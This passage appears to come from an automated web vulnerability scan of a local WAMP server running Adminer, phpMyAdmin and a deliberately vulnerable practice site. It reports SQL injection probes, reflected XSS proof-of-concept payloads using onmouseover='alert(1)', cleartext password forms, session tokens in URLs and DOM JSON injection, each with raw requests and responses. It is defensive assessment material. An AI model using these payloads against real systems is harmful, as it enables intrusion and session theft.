<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - dAYPdYZc - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.24. http://localhost/adminer/adminer-4.6.3.php [token parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The token parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the token parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=qfd3ckvk0mlk5hrpl41rj5kln4; adminer_key=67912841158106235c36bdcddfcda778; adminer_lang=bg

lang=bg&token=815669%3a574877'

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:59 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=bg; expires=Sat, 17 Nov 2018 21:02:59 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=67912841158106235c36bdcddfcda778; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTQ3NWM4NzZmOWVmOTJkOWIzOTczNGM3NzdiYjM2YWU=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4401
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="bg" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>........ - Adminer</title>
<link rel="style
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.25. http://localhost/adminer/adminer-4.6.3.php [username parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The username parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the username parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF'&db=AhfDADgK HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=; adminer_lang=en

auth%5bdriver%5d=server&auth%5bserver%5d=XJQTysvL&auth%5busername%5d=kMlMpcXg&auth%5bpassword%5d=v5R%21k2f%21Q2&auth%5bdb%5d=FRepmkVM&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:03:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:03:18 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:03:18 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-Y2NmMDMyMDIzMmViNTU1MWYwNDg5ZmU3NDhlNjBjNzM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - XJQTysvL - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
2. Cross-site scripting (reflected)

There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://localhost/ [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload nfyh6'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'kf80n was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /?lang=nfyh6'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b'kf80n HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5666
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
<a href='add_vhost.php?lang=nfyh6'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'kf80n'>
...[SNIP]...
2.2. http://localhost/add_vhost.php [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload zm9j6"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"eya9arf4y3b was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /add_vhost.php?lang=zm9j6%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22eya9arf4y3b&vh_name=978688&vh_folder=172918&vh_ip=363643&checkadd=1480203621&submit=Start+the+creation+of+the+VirtualHost+%28May+take+a+while...%29 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=m2q3v1qlre9d0srdoq236ilvpa

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5150
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
<a href="add_vhost.php?lang=zm9j6"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"eya9arf4y3b">
...[SNIP]...
3. Cleartext submission of password

There are 2 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

Applications should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://localhost/

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

This issue was found in multiple locations under the reported path.

Request 1

GET /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:01:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjM2M2NlMjQ3Y2E0Mzc2Nzg0OTc5ZjI5MTc3NmRkMTM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
</div>
<form action='' method='post'>
<div>
...[SNIP]...
<td><input type="password" name="auth[password]">
<tr>
...[SNIP]...

Request 2

GET /examplewebiste/login.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1523
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-equiv="Content
...[SNIP]...
<div id="content">

   <form action="login.php" method="post">

   <fieldset>
...[SNIP]...
</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />
...[SNIP]...

Request 3

GET /examplewebiste/vulnerabilities/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4323
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</h2>

       <form action="#" method="GET">
           Username:<br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password"><br />
...[SNIP]...
3.2. http://localhost/examplewebiste/vulnerabilities/csrf/

Summary

Severity:   High
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request 1

GET /examplewebiste/vulnerabilities/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:22:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4269
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
<br />

       <form action="#" method="GET">
           New password:<br />
           <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
...[SNIP]...
4. Session token in URL

There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

Applications should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

4.1. http://localhost/phpmyadmin/index.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request 1

GET /phpmyadmin/index.php?db=&table=&lang=en&token=.%5e.m%3fYGGHz9M*%24Fa&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=o4gqqj8cksmreut7dot66foa0j

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=1gmho1ppg0iso1oi36hrq7e9f9; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=1gmho1ppg0iso1oi36hrq7e9f9; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=opem5576eabmg3225tiiiemqgs; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14366
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
4.2. http://localhost/phpmyadmin/index.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request 1

GET /phpmyadmin/index.php?db=&table=&lang=en&token=-%7bM%5b0%22m%2cG%3bayBFnD&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=kj3550nvs27mp0ig29kpbai12g

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=a7fpavkn4irf2hnt3mclcq1udu; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=a7fpavkn4irf2hnt3mclcq1udu; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=f9ja24pftsf6vthf122f6ecqei; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14370
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
5. Client-side JSON injection (DOM-based)

There are 2 instances of this issue:

Issue background

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.

DOM-based JSON injection arises when a script incorporates controllable data into a string that is parsed as a JSON data structure and then processed by the application. An attacker may be able to use this behavior to construct a URL that, if visited by another application user, will cause arbitrary JSON data to be processed. Depending on the purpose for which this data is used, it may be possible to subvert the application's logic, or cause unintended actions on behalf of the user.

We automatically identify this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based JSON injection vulnerabilities is not to parse as JSON any string containing data that originated from an untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from modifying the JSON structure in inappropriate ways. This may involve strict validation of specific items to ensure they do not contain any characters that may interfere with the structure of the JSON when it is parsed.

5.1. http://localhost/phpmyadmin/js/vendor/js.cookie.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/js.cookie.js

Issue detail

The application may be vulnerable to DOM-based client-side JSON injection. Data is read from document.cookie and passed to JSON.parse().

Because the data originates from a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.

Request 1

GET /phpmyadmin/js/vendor/js.cookie.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:50 GMT
ETag: "f2e-574048eead880"
Accept-Ranges: bytes
Content-Length: 3886
Connection: close
Content-Type: application/javascript

/*!
* JavaScript Cookie v2.2.0
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;(function (factory) {
   var regist
...[SNIP]...
(!key) {
               result = {};
           }

           // To prevent the for loop in the first place assign an empty array
           // in case there are no cookies at all. Also prevents odd result when
           // calling "get()"
           var cookies = document.cookie ? document.cookie.split('; ') : [];
           var rdecode = /(%[0-9A-Z]{2})+/g;
           var i = 0;

           for (; i < cookies.length; i++) {
               var parts = cookies[i].split('=');
               var cookie = parts.slice(1).join('=');

               if (!this.json && cookie.charAt(0) === '"') {
                   cookie = cookie.slice(1, -1);
               }

               try {
                   var name = parts[0].replace(rdecode, decodeURIComponent);
                   cookie = converter.read ?
                       converter.read(cookie, name) : converter(cookie, name) ||
                       cookie.replace(rdecode, decodeURIComponent);


                   if (this.json) {
                       try {
                           cookie = JSON.parse(cookie);
                       } catch (e) {}
                   }

                   if (key === name) {
                       result = cookie;
                       break;
                   }

                   if (!key) {
                       result[name] = cookie;
                   }
               } catch (e) {}
           }

           return result;
       }

   
...[SNIP]...

Static analysis

Data is read from document.cookie and passed to JSON.parse() via the following statements:
5.2. http://localhost/phpmyadmin/js/vendor/js.cookie.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/js.cookie.js

Issue detail

The application may be vulnerable to DOM-based client-side JSON injection. Data is read from document.cookie and passed to JSON.parse().

Because the data originates from a cookie, the application's behavior is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. Applications often contain "cookie-forcing" conditions which make this possible, and such a condition in any related domain or subdomain can potentially be used for this purpose. Nonetheless, this limitation somewhat mitigates the impact of the vulnerability.

Request 1

GET /phpmyadmin/js/vendor/js.cookie.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:50 GMT
ETag: "f2e-574048eead880"
Accept-Ranges: bytes
Content-Length: 3886
Connection: close
Content-Type: application/javascript

/*!
* JavaScript Cookie v2.2.0
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;(function (factory) {
   var regist
...[SNIP]...
(!key) {
               result = {};
           }

           // To prevent the for loop in the first place assign an empty array
           // in case there are no cookies at all. Also prevents odd result when
           // calling "get()"
           var cookies = document.cookie ? document.cookie.split('; ') : [];
           var rdecode = /(%[0-9A-Z]{2})+/g;
           var i = 0;

           for (; i < cookies.length; i++) {
               var parts = cookies[i].split('=');
               var cookie = parts.slice(1).join('=');

               if (!this.json && cookie.charAt(0) === '"') {
                   cookie = cookie.slice(1, -1);
               }

               try {
                   var name = parts[0].replace(rdecode, decodeURIComponent);
                   cookie = converter.read ?
                       converter.read(cookie, name) : converter(cookie, name) ||
                       cookie.replace(rdecode, decodeURIComponent);


                   if (this.json) {
                       try {
                           cookie = JSON.parse(cookie);
                       } catch (e) {}
                   }

                   if (key === name) {
                       result = cookie;
                       break;
                   }

                   if (!key) {
                       result[name] = cookie;
                   }
               } catch (e) {}
           }

           return result;
       }

   
...[SNIP]...

Static analysis

Data is read from document.cookie and passed to JSON.parse() via the following statements:
6. Password submitted using GET method

There are 2 instances of this issue:

Issue background

Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Issue remediation

